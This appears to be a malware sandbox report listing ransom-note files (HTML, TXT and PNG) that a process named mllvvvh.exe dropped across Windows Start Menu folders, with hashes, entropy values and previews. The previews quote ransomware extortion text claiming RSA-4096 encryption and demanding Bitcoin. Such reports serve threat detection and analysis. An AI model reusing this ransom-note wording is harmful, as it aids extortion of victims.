                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):813024
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC5
                  MD5:65ED470E6AC4D7A0C231036045DA98D5
                  SHA1:A46A4256EAD116E2A9398494AC64E1FC4F4D746F
                  SHA-256:4CE9A7A8638BBE92047F805A47AB60ED0BA35CAD854DCFEE2664D3BBFF1DC36A
                  SHA-512:8220FC89B0FEED7AA3D52807E483D6A7E11F886A6EC899D5F646AA2B7359632AFE0BEC79416B4835A23C92FF150E7E83347646F69DAE10E5B5C07823553BB55B
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):25164
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:5BB3202EA02CDCC02A300245EFDDA4AD
                  SHA1:72A4EA5314E9656D4EA5791CAB7F3E6300EF3191
                  SHA-256:B2CD2CE84E7F89AC4C7E307BB1E8B769DD64AC5E862801E2F34F54E827968950
                  SHA-512:FB743F1C84D7EEA268ACDE000C3DBBF2DD1B731D9EA58D80FF7BA5965C969478C9E303DE85BC86B18983801D9EFBD70AE2208AB833E1923620B7B0C71E57985A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
